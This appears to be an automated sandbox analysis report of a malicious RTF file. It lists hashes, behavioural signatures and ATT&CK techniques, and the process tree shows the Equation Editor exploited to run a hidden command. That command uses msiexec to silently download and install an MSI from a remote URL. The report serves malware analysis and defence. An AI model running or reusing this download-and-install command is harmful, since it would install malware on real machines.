Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    01-02-2022 02:47

General

  • Target

    ee8ebaf9b33326b404b25f0d728db54e33209c382b0d5aaab3f26930801d3f7b.rtf

  • Size

    261KB

  • MD5

    4ec96fda4647d8e19ef7d8b978fa5308

  • SHA1

    cc2a91f58924c0611a3123ebd5ce2ea065a2541e

  • SHA256

    ee8ebaf9b33326b404b25f0d728db54e33209c382b0d5aaab3f26930801d3f7b

  • SHA512

    fbaadb4c0d017d029bafa8ba42102631c8ee03b53691ce64638f81ad1a38be8db606610d893b37fec73dba33e6e830622599f0000aa06e87a43bdbcbc5a915a9

Score
7/10

Malware Config

Signatures

  • Use of msiexec (install) with remote resource 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 2 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ee8ebaf9b33326b404b25f0d728db54e33209c382b0d5aaab3f26930801d3f7b.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:800
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1184
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:1204
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe & /C CD C: & msiexec.exe /i http://nathanlaprie.fr/wp-includes/js/tinymce/plugins/wplink//app/dir/0uj5pr3vnestq1o.msi /quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1368
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec.exe /i http://nathanlaprie.fr/wp-includes/js/tinymce/plugins/wplink//app/dir/0uj5pr3vnestq1o.msi /quiet
          3⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:1120
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Launches Equation Editor
      PID:1776
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1208

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Execution

    Exploitation for Client Execution

    1
    T1203

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/800-54-0x0000000072421000-0x0000000072424000-memory.dmp
      Filesize

      12KB

    • memory/800-55-0x000000006FEA1000-0x000000006FEA3000-memory.dmp
      Filesize

      8KB

    • memory/800-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/800-57-0x0000000075F21000-0x0000000075F23000-memory.dmp
      Filesize

      8KB

    • memory/800-63-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1208-61-0x000007FEFB931000-0x000007FEFB933000-memory.dmp
      Filesize

      8KB